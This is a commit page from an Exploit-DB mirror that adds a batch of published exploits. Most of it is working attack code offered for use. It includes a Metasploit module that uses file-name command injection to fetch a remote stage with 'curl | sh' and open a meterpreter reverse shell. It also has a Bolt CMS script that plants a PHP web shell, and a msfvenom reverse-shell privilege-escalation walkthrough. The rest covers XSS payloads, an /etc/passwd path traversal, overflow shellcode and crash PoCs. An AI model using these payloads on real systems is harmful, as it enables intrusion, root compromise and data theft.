bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2020-04-07

Browse source 
17 changes to exploits/shellcodes

Product Key Explorer 4.2.2.0 - 'Key' Denial of Service (PoC)
SpotAuditor 5.3.4 - 'Name' Denial of Service (PoC)
Nsauditor 3.2.0.0 - 'Name' Denial of Service (PoC)
Frigate 3.36 - Denial of Service (PoC)
UltraVNC Launcher 1.2.4.0 - 'RepeaterHost' Denial of Service (PoC)
UltraVNC Launcher 1.2.4.0 - 'Password' Denial of Service (PoC)
UltraVNC Viewer 1.2.4.0 - 'VNCServer' Denial of Service (PoC)
ZOC Terminal v7.25.5 - 'Private key file' Denial of Service (PoC)
Memu Play 7.1.3 - Insecure Folder Permissions
Triologic Media Player 8 - '.m3l' Buffer Overflow (Unicode) (SEH)
Microsoft NET USE win10 - Insufficient Authentication Logic
LimeSurvey 4.1.11 - 'Survey Groups' Persistent Cross-Site Scripting
Vesta Control Panel 0.9.8-26 - Authenticated Remote Code Execution (Metasploit)
WhatsApp Desktop 0.3.9308 - Persistent Cross-Site Scripting
Bolt CMS 3.7.0 - Authenticated Remote Code Execution
LimeSurvey 4.1.11 - 'File Manager' Path Traversal
pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting
This commit is contained in:
Offensive Security 2020-04-07 05:02:01 +00:00
parent 5a8a1df508
commit 85bef6929f
18 changed files with 1241 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

39
exploits/freebsd/webapps/48300.txt Normal file
View file

@ -0,0 +1,39 @@
# Exploit Title: pfSense 2.4.4-P3 - 'User Manager' Persistent Cross-Site Scripting
# Date: 2020-04-02
# Exploit Author: Matthew Aberegg
# Vendor Homepage: https://www.pfsense.org
# Version: PfSense 2.4.4-P3
# Tested on: FreeBSD 11.2-RELEASE-p10
# CVE : CVE-2020-11457
# Vulnerability Details
# Description : A persistent cross-site scripting vulnerability exists within the 'User Manager' functionality of the pfSense administration panel.
# Vulnerable Parameter : descr
# POC
# Exploit Details : The following request will create a user in the 'User Manager' functionality with an XSS payload as the Full Name.
# This payload can be triggered by navigating to "https://TARGET/system_usermanager_addprivs.php?userid=0" where userid is
# the id of the user containing the payload.
POST /system_usermanager.php?act=new HTTP/1.1
Host: TARGET
Connection: close
Content-Length: 410
Cache-Control: max-age=0
Origin: https://TARGET
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Sec-Fetch-Dest: document
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Referer: https://TARGET/system_usermanager.php?act=new
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=ebd302521a887cef99f517e3ac6bdd7d
__csrf_magic=sid%3A3689bbf23a3350994d7543c082fc36d16397208d%2C1585881631&usernamefld=TEST&passwordfld1=password&passwordfld2=password&descr=%3Cimg+src%3D%2F+onerror%3Dalert%281%29%3E&expires=&webguicss=pfSense.css&webguifixedmenu=&webguihostnamemenu=&dashboardcolumns=2&name=&caref=5e643dcfd524e&keylen=2048&lifetime=3650&authorizedkeys=&ipsecpsk=&act=&userid=&privid=&certid=&utype=user&oldusername=&save=Save

239
exploits/multiple/webapps/48294.rb Executable file
View file

@ -0,0 +1,239 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Ftp
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
def initialize(info={})
super(update_info(info,
'Name' => "Vesta Control Panel Authenticated Remote Code Execution",
'Description' => %q{
This module exploits command injection vulnerability in v-list-user-backups bash script file.
Low privileged authenticated users can execute arbitrary commands under the context of the root user.
An authenticated attacker with a low privileges can inject a payload in the file name starts with dot.
During the user backup process, this file name will be evaluated by the v-user-backup bash scripts. As
result of that backup process, when an attacker try to list existing backups injected payload will be
executed.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Mehmet Ince <mehmet@mehmetince.net>' # author & msf module
],
'References' =>
[
['URL', 'https://pentest.blog/vesta-control-panel-second-order-remote-code-execution-0day-step-by-step-analysis/'],
['CVE', '2020-10808']
],
'DefaultOptions' =>
{
'SSL' => true,
'RPORT' => 8083,
'WfsDelay' => 300,
'Payload' => 'python/meterpreter/reverse_tcp'
},
'Platform' => ['python'],
'Arch' => ARCH_PYTHON,
'Targets' => [[ 'Automatic', { }]],
'Privileged' => false,
'DisclosureDate' => "Mar 17 2020",
'DefaultTarget' => 0
))
register_options(
[
Opt::RPORT(8083),
OptString.new('USERNAME', [true, 'The username to login as']),
OptString.new('PASSWORD', [true, 'The password to login with']),
OptString.new('TARGETURI', [true, 'The URI of the vulnerable instance', '/'])
]
)
deregister_options('FTPUSER', 'FTPPASS')
end
def username
datastore['USERNAME']
end
def password
datastore['PASSWORD']
end
def login
#
# This is very simple login process. Nothing important.
# We will be using cookie and csrf_token across the module so that we are global variable.
#
print_status('Retrieving cookie and csrf token values')
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'login', '/'),
})
if res && res.code == 200 && !res.get_cookies.empty?
@cookie = res.get_cookies
@csrf_token = res.body.scan(/<input type="hidden" name="token" value="(.*)">/).flatten[0] || ''
if @csrf_token.empty?
fail_with(Failure::Unknown, 'There is no CSRF token at HTTP response.')
end
else
fail_with(Failure::Unknown, 'Something went wrong.')
end
print_good('Cookie and CSRF token values successfully retrieved')
print_status('Authenticating to HTTP Service with given credentials')
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'login', '/'),
'cookie' => @cookie,
'vars_post' => {
'token' => @csrf_token,
'user' => username,
'password' => password
}
})
if res && res.code == 302 && !res.get_cookies.empty?
print_good('Successfully authenticated to the HTTP Service')
@cookie = res.get_cookies
else
fail_with(Failure::Unknown, 'Credentials are not valid.')
end
end
def is_scheduled_backup_running
res = trigger_scheduled_backup
#
# MORE explaination.
#
if res && res.code == 302
res = trigger_payload
if res.body.include?('An existing backup is already running. Please wait for that backup to finish.')
return true
else
print_good('It seems scheduled backup is done ..! Triggerring payload <3')
return false
end
else
fail_with(Failure::Unknown, 'Something went wrong. Did you get your session ?')
end
return false
end
def trigger_payload
res = send_request_cgi({
'method' => 'GET',
'cookie' => @cookie,
'uri' => normalize_uri(target_uri.path, 'list', 'backup', '/'),
})
if res && res.code == 200
res
else
fail_with(Failure::Unknown, 'Something went wrong. Maybe session timed out ?')
end
end
def trigger_scheduled_backup
res = send_request_cgi({
'method' => 'GET',
'cookie' => @cookie,
'uri' => normalize_uri(target_uri.path, 'schedule', 'backup', '/'),
})
if res && res.code == 302 && res.headers['Location'] =~ /\/list\/backup\//
res
else
fail_with(Failure::Unknown, 'Something went wrong.')
end
end
def payload_implant
#
# Our payload will be placed as a file name on FTP service.
# Payload lenght can't be more then 255 and SPACE can't be used because of the
# bug in the backend software. Due to these limitations, I used web delivery method.
#
# When the initial payload executed. It will execute very short perl command, which is going to fetch
# actual python meterpreter first stager and execute it.
#
final_payload = "curl -sSL #{@second_stage_url} | sh".to_s.unpack("H*").first
p = "perl${IFS}-e${IFS}'system(pack(qq,H#{final_payload.length},,qq,#{final_payload},))'"
# Yet another datastore variable overriding.
if datastore['SSL']
ssl_restore = true
datastore['SSL'] = false
end
port_restore = datastore['RPORT']
datastore['RPORT'] = 21
datastore['FTPUSER'] = username
datastore['FTPPASS'] = password
#
# Connecting to the FTP service with same creds as web ui.
# Implanting the very first stage of payload as a empty file.
#
if (not connect_login)
fail_with(Failure::Unknown, 'Unable to authenticate to FTP service')
end
print_good('Successfully authenticated to the FTP service')
res = send_cmd_data(['PUT', ".a';$(#{p});'"], "")
if res.nil?
fail_with(Failure::UnexpectedReply, "Failed to upload the payload to FTP server")
end
print_good('Successfully uploaded the payload as a file name')
disconnect
# Revert datastore variables.
datastore['RPORT'] = port_restore
datastore['SSL'] = true if ssl_restore
end
def exploit
start_http_server
payload_implant
login
trigger_scheduled_backup
print_good('Scheduled backup has ben started. Exploitation may take up to 5 minutes.')
while is_scheduled_backup_running == true
print_status('It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...')
Rex.sleep(30)
end
stop_service
end
def on_request_uri(cli, request)
print_good('First stage is executed ! Sending 2nd stage of the payload')
second_stage = "python -c \"#{payload.encoded}\""
send_response(cli, second_stage, {'Content-Type'=>'text/html'})
end
def start_http_server
#
# HttpClient and HttpServer use same SSL variable :(
# We don't need a SSL for payload delivery.
#
if datastore['SSL']
ssl_restore = true
datastore['SSL'] = false
end
start_service({'Uri' => {
'Proc' => Proc.new { |cli, req|
on_request_uri(cli, req)
},
'Path' => resource_uri
}})
print_status("Second payload download URI is #{get_uri}")
# We need that global variable since get_uri keep using SSL from datastore
# We have to get the URI before restoring the SSL.
@second_stage_url = get_uri
datastore['SSL'] = true if ssl_restore
end
end

42
exploits/multiple/webapps/48295.txt Normal file
View file

@ -0,0 +1,42 @@
# Title: WhatsApp Desktop 0.3.9308 - Persistent Cross-Site Scripting
# Date: 2020-01-21
# Exploit Author: Gal Weizman
# Vendor Homepage: https://www.whatsapp.com
# Software Link: https://web.whatsapp.com/desktop/windows/release/x64/WhatsAppSetup.exe
# Software Link: https://web.whatsapp.com/desktop/mac/files/WhatsApp.dmg
# Version: 0.3.9308
# Tested On: Mac OS, Windows, iPhone
# CVE: https://nvd.nist.gov/vuln/detail/CVE-2019-18426
// step 1: open WhatsApp Web and enter a conversation (Will only work on WhatsApp Web source code as compiled with version 0.3.9308)
// step 2: open devtools and search in all files "t=e.id"
// step 3: after prettifying, set a breakpoint at the line where "t = e.id" can be found
// step 4: paste "https://example.com" in the text box and hit "Enter"
// step 5: when the code stops at the breakpoint, paste the following exploit code in the console and hit "Enter"
var payload = `(async function() {
alert(navigator.userAgent);
(async function() {
// read "file:///C:/windows/system32/drivers/etc/hosts" content
const r = await fetch(atob('ZmlsZTovLy9DOi93aW5kb3dzL3N5c3RlbTMyL2RyaXZlcnMvZXRjL2hvc3Rz'));
const t = await r.text();
alert(t);
}())
}())`;
payload = `javascript:"https://example.com";eval(atob("${btoa(payload)}"))`;
e.__x_matchedText = payload;
e.__x_body = `
Innocent text
${payload}
More Innocent text
`;
// step 6: press F8 in order for the execution to continue
// result: a message should be sent to the victim that once is clicked will execute the payload above
// further information: https://github.com/weizman/CVE-2019-18426

30
exploits/php/webapps/48289.txt Normal file
View file

@ -0,0 +1,30 @@
# Exploit Title: LimeSurvey 4.1.11 - 'Survey Groups' Persistent Cross-Site Scripting
# Date: 2020-04-02
# Exploit Author: Matthew Aberegg, Michael Burkey
# Vendor Homepage: https://www.limesurvey.org
# Version: LimeSurvey 4.1.11+200316
# Tested on: Ubuntu 18.04.4
# CVE : CVE-2020-11456
# Vulnerability Details
Description : A stored cross-site scripting vulnerability exists within the "Survey Groups" functionality of the LimeSurvey administration panel.
Vulnerable Parameter : "title"
# POC
POST /limesurvey/index.php/admin/surveysgroups/sa/create HTTP/1.1
Host: TARGET
Content-Length: 374
Cache-Control: max-age=0
Origin: http://TARGET
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://TARGET/limesurvey/index.php/admin/surveysgroups/sa/create
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: LS-ERXSBPYJOOGIGFYW=7ge1q4rvsdgs0b6usksh3j5lb0; YII_CSRF_TOKEN=UmZ5cjJjY0ZhUExCcUYzQlU0VVBaV3BmZ1NWbTBHQ0oh7CIrJ3fZHoEIY4fzcDjOZJUykirqanC63j5b8gpHug%3D%3D
Connection: close
YII_CSRF_TOKEN=UmZ5cjJjY0ZhUExCcUYzQlU0VVBaV3BmZ1NWbTBHQ0oh7CIrJ3fZHoEIY4fzcDjOZJUykirqanC63j5b8gpHug%3D%3D&SurveysGroups%5Bowner_id%5D=&SurveysGroups%5Bgsid%5D=&SurveysGroups%5Bname%5D=XSSTEST&SurveysGroups%5Btitle%5D=%3Cimg+src%3D%2F+onerror%3Dalert%281%29%3E&SurveysGroups%5Bdescription%5D=This+is+a+test.&SurveysGroups%5Bsortorder%5D=4&SurveysGroups%5Bparent_id%5D=&yt0=

167
exploits/php/webapps/48296.py Executable file
View file

@ -0,0 +1,167 @@
# Exploit Title: Bolt CMS 3.7.0 - Authenticated Remote Code Execution
# Date: 2020-04-05
# Exploit Author: r3m0t3nu11
# Vendor Homepage: https://bolt.cm/
# Software Link: https://bolt.cm/
# Version: up to date and 6.x
# Tested on: Linux
# CVE : not-yet-0day
# last version
# p0c
#!/usr/bin/python
import requests
import sys
import warnings
import re
import os
from bs4 import BeautifulSoup
from colorama import init
from termcolor import colored
init()
print(colored('''
Pre Auth rce with low credintanl
By @r3m0t3nu11 speical thanks to @dracula @Mr_Hex''',"blue"))
if len(sys.argv) != 4:
print((len(sys.argv)))
print((colored("[~] Usage : ./bolt.py url username password","red")))
exit()
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
request = requests.session()
print((colored("[+] Retrieving CSRF token to submit the login
form","green")))
page = request.get(url+"/bolt/login")
html_content = page.text
soup = BeautifulSoup(html_content, 'html.parser')
token = soup.findAll('input')[2].get("value")
login_info = {
"user_login[username]": username,
"user_login[password]": password,
"user_login[login]": "",
"user_login[_token]": token
}
login_request = request.post(url+"/bolt/login", login_info)
print((colored("[+] Login token is : {0}","green")).format(token))
aaa = request.get(url+"/bolt/profile")
soup0 = BeautifulSoup(aaa.content, 'html.parser')
token0 = soup0.findAll('input')[6].get("value")
data_profile = {
"user_profile[password][first]":"password",
"user_profile[password][second]":"password",
"user_profile[email]":"a@a.com",
"user_profile[displayname]":"<?php system($_GET['test']);?>",
"user_profile[save]":"",
"user_profile[_token]":token0
}
profile = request.post(url+'/bolt/profile',data_profile)
cache_csrf = request.get(url+"/bolt/overview/showcases")
soup1 = BeautifulSoup(cache_csrf.text, 'html.parser')
csrf = soup1.findAll('div')[12].get("data-bolt_csrf_token")
asyncc = request.get(url+"/async/browse/cache/.sessions?multiselect=true")
soup2 = BeautifulSoup(asyncc.text, 'html.parser')
tables = soup2.find_all('span', class_ = 'entry disabled')
print((colored("[+] SESSION INJECTION ","green")))
for all_tables in tables:
f= open("session.txt","a+")
f.write(all_tables.text+"\n")
f.close()
num_lines = sum(1 for line in open('session.txt'))
renamePostData = {
"namespace": "root",
"parent": "/app/cache/.sessions",
"oldname": all_tables.text,
"newname": "../../../public/files/test{}.php".format(num_lines),
"token": csrf
}
rename = request.post(url+"/async/folder/rename", renamePostData)
try:
url1 = url+'/files/test{}.php?test=ls%20-la'.format(num_lines)
rev = requests.get(url1).text
r1 = re.findall('php',rev)
r2 = r1[0]
if r2 == "php" :
fileINJ = "test{}".format(num_lines)
print((colored("[+] FOUND : "+fileINJ,"green")))
except IndexError:
print((colored("[-] Not found.","red")))
new_name = 0
while new_name != 'quit':
inputs = input(colored("Enter OS command , for exit 'quit' :
","green","on_red"))
if inputs == "quit" :
exit()
else:
a = requests.get(url+"/files/{}.php?test={}".format(fileINJ,inputs))
aa = a.text
r11 = re.findall('...displayname";s:..:"([\w\s\W]+)',aa)
print((r11)[0])
Greetz to : all my friends

18
exploits/php/webapps/48297.txt Normal file
View file

@ -0,0 +1,18 @@
# Exploit Title: LimeSurvey 4.1.11 - 'File Manager' Path Traversal
# Date: 2020-04-02
# Exploit Author: Matthew Aberegg, Michael Burkey
# Vendor Homepage: https://www.limesurvey.org
# Version: LimeSurvey 4.1.11+200316
# Tested on: Ubuntu 18.04.4
# CVE : CVE-2020-11455
# Vulnerability Details
# Description : A path traversal vulnerability exists within the "File Manager" functionality of LimeSurvey
# that allows an attacker to download arbitrary files. The file manager functionality will also
# delete the file after it is downloaded (if the web service account has permissions to do so),
# allowing an attacker to cause a denial of service by specifying a critical LimeSurvey configuration file.
Vulnerable Parameter : "path"
# POC
https://TARGET/limesurvey/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd

35
exploits/windows/dos/48284.py Executable file
View file

@ -0,0 +1,35 @@
# Exploit Title: Product Key Explorer 4.2.2.0 - 'Key' Denial of Service (PoC)
# Discovery by: 0xMoHassan
# Date: 2020-04-04
# Vendor Homepage: http://www.nsauditor.com
# Software Link: http://www.nsauditor.com/downloads/productkeyexplorer_setup.exe
# Tested Version: 4.2.2.0
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows XP - SP3
# About App
# Product Key Explorer is a powerful product key finder solution for Windows, designed to help users find, # recover and backup activation keys for +9000 popular software programs installed on local or network computers.
# PoC
# 1.Run the python script, it will create a new file "POC.txt"
# 3.Run Product Key Explorer and click on "Register -> Enter Registration Code"
# 2.Paste the content of POC.txt into the Field: 'Key'
# 6.click 'ok'
# 5.Magic happen :)
#!/usr/bin/env python
buff = "\x41" *500
buff += "\x41" * 500
try:
f=open("POC.txt","w")
print "[+] Creating %s bytes payload.." %len(buff)
f.write(buff)
f.close()
print "[+] POC created!"
except:
print "POC cannot be created"

36
exploits/windows/dos/48285.py Executable file
View file

@ -0,0 +1,36 @@
# Exploit Title: SpotAuditor 5.3.4 - 'Name' Denial of Service (PoC)
# Exploit Author: 0xMoHassan
# Date: 2020-04-04
# Vendor Homepage: https://www.spotauditor.com/
# Software Link: http://www.nsauditor.com/downloads/spotauditor_setup.exe
# Tested Version: 5.3.4
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows XP - SP3
# About App
# SpotAuditor is an advanced password recovery solution. The software recovers over 40 popular programs passwords,
# including passwords saved Google Chrome, Internet Explorer, Firefox and Opera browsers, Microsoft Office Outlook
# smtp and pop passwords, Hotmail password, Facebook password, Gmail password, Yahoo password, Aol password, 20
# top FTP program passwords, recovers saved passwords hidden behind of asterisks on dialogs and web forms.
# PoC
# 1.Run the python script, it will create a new file "POC.txt"
# 3.Run SpotAuditor and click on "Register -> Enter Registration Code"
# 2.Paste the content of POC.txt into the Field: 'Name'
# 6.click 'ok'
# 5.Magic happen :)
#!/usr/bin/env python
buff = "\x41" *500
buff += "\x41" * 500
try:
f=open("POC.txt","w")
print "[+] Creating %s bytes payload.." %len(buff)
f.write(buff)
f.close()
print "[+] POC created!"
except:
print "POC cannot be created"

39
exploits/windows/dos/48286.py Executable file
View file

@ -0,0 +1,39 @@
# Exploit Title: Nsauditor 3.2.0.0 - 'Name' Denial of Service (PoC)
# Discovery by: 0xMoHassan
# Date: 2020-04-04
# Vendor Homepage: http://www.nsauditor.com
# Software Link: http://www.nsauditor.com/downloads/nsauditor_setup.exe
# Tested Version: 3.2.0.0
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on OS: Windows XP - SP3
# About App
# Nsauditor Network Security Auditor is a powerful network security tool designed to scan networks and hosts for vulnerabilities,
# and to provide security alerts.Nsauditor network auditor checks enterprise network for all potential methods that
# a hacker might use to attack it and create a report of potential problems that were found , Nsauditor network auditing
# software significantly reduces the total cost of network management in enterprise environments by enabling
# IT personnel and systems administrators gather a wide range of information from all the computers in the network without
# installing server-side applications on these computers and create a report of potential problems that were found.
# PoC
# 1.Run the python script, it will create a new file "POC.txt"
# 3.Run Nsauditor and click on "Register -> Enter Registration Code"
# 2.Paste the content of POC.txt into the Field: 'Name'
# 6.click 'ok'
# 5.Magic happen :)
#!/usr/bin/env python
buff = "\x41" *500
buff += "\x41" * 500
try:
f=open("POC.txt","w")
print "[+] Creating %s bytes payload.." %len(buff)
f.write(buff)
f.close()
print "[+] POC created!"
except:
print "POC cannot be created"

26
exploits/windows/dos/48287.py Executable file
View file

@ -0,0 +1,26 @@
# Exploit Title: Frigate 3.36 - Denial of Service (PoC)
# Date: 2020-04-05
# Exploit Author: inter
# Vendor Homepage: http://www.Frigate3.com/
# Software Link Download: http://www.Frigate3.com/download/Frigate3_Std_v36.exe
# Vulnerable Software: Firgate
# Version: 3.36
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on: Windows 7 Ultimate Service Pack 1 (64 bit - English)
#Steps to Produce the Crash:
# 1.- Run python code: crash.py
# 2.- Copy content to clipboard
# 3.- Open "Frigate3.exe"
# 4.- Go to "Disk" > Find Computer
# 5.- Paste ClipBoard into the "Computer Name:" field
# 6.- Click on OK
# 7.- Crashed
#Python "crash.py" Code:
buffer = "\x41" * 2000
f = open ("Frigate.txt", "w")
f.write(buffer)
f.close()

23
exploits/windows/dos/48288.py Executable file
View file

@ -0,0 +1,23 @@
# Exploit Title: UltraVNC Launcher 1.2.4.0 - 'RepeaterHost' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2020-04-05
# Vendor Homepage: https://www.uvnc.com/
# Software Link : https://www.uvnc.com/component/jdownloads/send/0-/394-ultravnc-1240-x86-setup.html?Itemid=0
# Tested Version: 1.2.4.0
# Vulnerability Type: Local
# Tested on OS: Windows 10 Pro x64 es
#Steps to produce the crash:
#1.- Run python code: UltraVNC_1.2.40-Launcher_RepeaterHost.py
#2.- Open UltraVNC_1.2.40-Launcher_RepeaterHost.txt and copy content to clipboard
#3.- Open UltraVNC Launcher
#4.- Select "Properties"
#5.- In "Repeater host" Paste Clipboard
#6.- Click on "OK"
#7.- Crashed
cod = "\x41" * 300
f = open('UltraVNC_1.2.40-Launcher_RepeaterHost.txt', 'w')
f.write(cod)
f.close()

24
exploits/windows/dos/48290.py Executable file
View file

@ -0,0 +1,24 @@
# Exploit Title: UltraVNC Launcher 1.2.4.0 - 'Password' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2020-04-05
# Vendor Homepage: https://www.uvnc.com/
# Software Link : https://www.uvnc.com/component/jdownloads/send/0-/394-ultravnc-1240-x86-setup.html?Itemid=0
# Tested Version: 1.2.4.0
# Vulnerability Type: Local
# Tested on OS: Windows 10 Pro x64 es
#Steps to produce the crash:
#1.- Run python code: UltraVNC_1.2.40-Launcher_Password.py
#2.- Open UltraVNC_1.2.40-Launcher_Password.txt and copy content to clipboard
#3.- Open UltraVNC Launcher
#4.- Select "Properties"
#5.- In "Password" Paste Clipboard
#6.- Click on "OK"
#7.- Click on "Propieties"
#8.- Crashed
cod = "\x41" * 300
f = open('UltraVNC_1.2.40-Launcher_Password.txt', 'w')
f.write(cod)
f.close()

22
exploits/windows/dos/48291.py Executable file
View file

@ -0,0 +1,22 @@
# Exploit Title: UltraVNC Viewer 1.2.4.0 - 'VNCServer' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2020-04-05
# Vendor Homepage: https://www.uvnc.com/
# Software Link : https://www.uvnc.com/component/jdownloads/send/0-/394-ultravnc-1240-x86-setup.html?Itemid=0
# Tested Version: 1.2.4.0
# Vulnerability Type: Local
# Tested on OS: Windows 10 Pro x64 es
# Steps to produce the crash:
#1.- Run python code: UltraVNC_1.2.40-Viewer_VNCServer.py
#2.- Open UltraViewer_VNCServer.txt and copy content to clipboard
#3.- Open UltraVNC Viewer
#4.- In "VNC Server" Paste Clipboard
#5.- Click on "Connect"
#6.- Crashed
cod = "\x41" * 256
f = open('UltraVNC_1.2.40-Viewer_VNCServer.txt', 'w')
f.write(cod)
f.close()

22
exploits/windows/dos/48292.txt Normal file
View file

@ -0,0 +1,22 @@
# Exploit Title: ZOC Terminal v7.25.5 - 'Private key file' Denial of Service (PoC)
# Discovery by: chuyreds
# Discovery Date: 2020-04-05
# Vendor Homepage: https://www.emtec.com
# Software Link : http://www.emtec.com/downloads/zoc/zoc7255_x64.exe
# Tested Version: 7.25.5
# Vulnerability Type: Local
# Tested on OS: Windows 10 Pro x64 es
# Steps to produce the crash:
#1.- Run python code: ZOC_7.25.5_PrivateKeyFile.py
#2.- Open ZOC_7.25.5_PrivateKeyFile.txt and copy content to clipboard
#3.- Open ZOC Terminal
#4.- Select File > Create SSH Key Files...
#5.- Select "Private key file:" field erease and Paste ClipBoard
#6.- Click on "Create public/private key files..."
#7.- Crashed
buffer = "\x41" * 2000
f = open ("ZOC_7.25.5_PrivateKeyFile.txt", "w")
f.write(buffer)
f.close()

70
exploits/windows/local/48283.txt Normal file
View file

@ -0,0 +1,70 @@
# Exploit Title: Memu Play 7.1.3 - Insecure Folder Permissions
# Discovery by: chuyreds
# Discovery Date: 2020-03-08
# Vendor Homepage: https://www.memuplay.com/
# Software Link : https://www.memuplay.com/download-en.php?file_name=Memu-Setup&from=official_release
# Tested Version: 7.1.3
# Vulnerability Type: Local
# Tested on OS: Windows 10 Pro x64 es
# Description:
# Memu Play 7.1.3 suffers from Privilege Escalation due to insecure file permissions
# Prerequisites
# Local, Low privilege access with restart capabilities
# Details
# By default the Authenticated Users group has the modify permission to ESM folders/files as shown below.
# A low privilege account is able to rename the MemuService.exe file located in this same path and replace
# with a malicious file that would connect back to an attacking computer giving system level privileges
# (nt authority\system) due to the service running as Local System.
# While a low privilege user is unable to restart the service through the application, a restart of the
# computer triggers the execution of the malicious file.
C:\>icacls "C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe"
C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe Everyone:(I)(F)
BUILTIN\Administradores:(I)(F)
BUILTIN\Usuarios:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
APPLICATION PACKAGE AUTHORITY\TODOS LOS PAQUETES DE APLICACIÓN RESTRINGIDOS:(I)(RX)
Se procesaron correctamente 1 archivos; error al procesar 0 archivos
C:\>sc qc MEmuSVC
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: MEmuSVC
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: "C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe"
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : MEmuSVC
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
# Proof of Concept
1. Generate malicious .exe on attacking machine
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.130 LPORT=443 -f exe > /var/www/html/MemuService.exe
2. Setup listener and ensure apache is running on attacking machine
nc -lvp 443
service apache2 start
3. Download malicious .exe on victim machine
Open browser to http://192.168.1.130/MemuService.exe and download
4. Overwrite file and copy malicious .exe.
Renename C:\Program Files (x86)\Microvirt\MEmu\MemuService.exe > MemuService.bak
Copy/Move downloaded 'MemuService.exe' file to C:\Program Files (x86)\Microvirt\MEmu\
5. Restart victim machine
6. Reverse Shell on attacking machine opens
C:\Windows\system32>whoami
whoami
nt authority\system

79
exploits/windows/local/48293.py Executable file
View file

@ -0,0 +1,79 @@
# Exploit Title: Triologic Media Player 8 - '.m3l' Buffer Overflow (Unicode) (SEH)
# Date: 2020-04-04
# Author: Felipe Winsnes
# Software Link: http://download.cnet.com/Triologic-Media-Player/3000-2139_4-10691520.html
# Version: 8
# Tested on: Windows 7 (x86)
# Proof of Concept:
# 1.- Run the python script, it will create a new file called "poc.m3l".
# 2.- Open the Application.
# 3.- Some windows warning boxes regarding sound issues may pop up, just click OK.
# 4.- Click on the bottom-right button that displays an arrow and has written "LIST".
# 5.- Select the file "poc.m3l".
# 6.- Profit.
import struct
# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/unicode_mixed BufferRegister=EAX EXITFUNC=thread
# Payload size: 512 bytes
buf = b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += b"\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += b"\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += b"\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += b"\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += b"\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += b"\x47\x42\x39\x75\x34\x4a\x42\x79\x6c\x7a\x48\x61\x72"
buf += b"\x39\x70\x6b\x50\x49\x70\x73\x30\x54\x49\x47\x75\x70"
buf += b"\x31\x79\x30\x4f\x74\x72\x6b\x70\x50\x70\x30\x32\x6b"
buf += b"\x51\x42\x7a\x6c\x74\x4b\x42\x32\x6e\x34\x64\x4b\x64"
buf += b"\x32\x6b\x78\x6c\x4f\x57\x47\x4d\x7a\x4d\x56\x4e\x51"
buf += b"\x59\x6f\x46\x4c\x4f\x4c\x71\x51\x61\x6c\x49\x72\x4c"
buf += b"\x6c\x6d\x50\x36\x61\x46\x6f\x6c\x4d\x4a\x61\x37\x57"
buf += b"\x69\x52\x7a\x52\x31\x42\x51\x47\x74\x4b\x6e\x72\x4a"
